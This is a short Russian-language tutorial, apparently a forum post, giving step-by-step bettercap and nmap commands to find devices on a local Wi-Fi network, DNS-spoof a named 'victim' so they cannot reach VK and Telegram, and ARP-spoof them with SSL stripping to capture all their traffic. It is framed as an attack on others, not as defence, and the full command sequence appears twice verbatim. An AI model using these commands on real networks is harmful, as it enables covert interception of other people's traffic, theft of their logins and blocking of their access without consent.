Приветствую! Сегодня мы будем перехватывать трафик и блокироваь доступ к сайтам через локальную сеть.
Установка:
1. Это не работает в Термукс. Для работы мы будем использовать линукс. Запускаем и вводим следующие команды:
• apt-get update
• apt-get upgrade
• apt -y install golang
• apt -y install bettercap
2. Для начала нам надо узнать какие устройства подключены к Wi-FI:
• nmap 192.168.1.1/24(192.168.1.1 это айпи роуетра)/24(это маска сети)
Запускаем Bettercap, с его помощью мы будем перехватывать данные и управлять сетью:
• sudo bettercap
Блокируем сайты.
Пишем через запятую сайты, которые хотим заблокировать:
• set dns.spoof.domains m.vk.com, telegram.org, my.telegram.org
Указываем локальный IP жертвы который мы получили из сканирования NMAP:
• set dns.spoof.address 192.168.1.5
dns.spoof on - START
После того, как мы запустили dns-spoof, жертва не сможет зайти на указанный вами сайт.
3. Далее просматриваем трафик жертвы:
- set http.proxy.sslstrip true
- events.clear
- set net.sniff.verbose false
- set net.sniff.local true
- set arp.spoof.targets IP жертвы
- arp.spoof on
- http.proxy on
- net.sniff on
После этого у вас будут отображаться все пакеты жертвы.
Установка:
1. Это не работает в Термукс. Для работы мы будем использовать линукс. Запускаем и вводим следующие команды:
• apt-get update
• apt-get upgrade
• apt -y install golang
• apt -y install bettercap
2. Для начала нам надо узнать какие устройства подключены к Wi-FI:
• nmap 192.168.1.1/24(192.168.1.1 это айпи роуетра)/24(это маска сети)
Запускаем Bettercap, с его помощью мы будем перехватывать данные и управлять сетью:
• sudo bettercap
Блокируем сайты.
Пишем через запятую сайты, которые хотим заблокировать:
• set dns.spoof.domains m.vk.com, telegram.org, my.telegram.org
Указываем локальный IP жертвы который мы получили из сканирования NMAP:
• set dns.spoof.address 192.168.1.5
dns.spoof on - START
После того, как мы запустили dns-spoof, жертва не сможет зайти на указанный вами сайт.
3. Далее просматриваем трафик жертвы:
- set http.proxy.sslstrip true
- events.clear
- set net.sniff.verbose false
- set net.sniff.local true
- set arp.spoof.targets IP жертвы
- arp.spoof on
- http.proxy on
- net.sniff on
После этого у вас будут отображаться все пакеты жертвы.
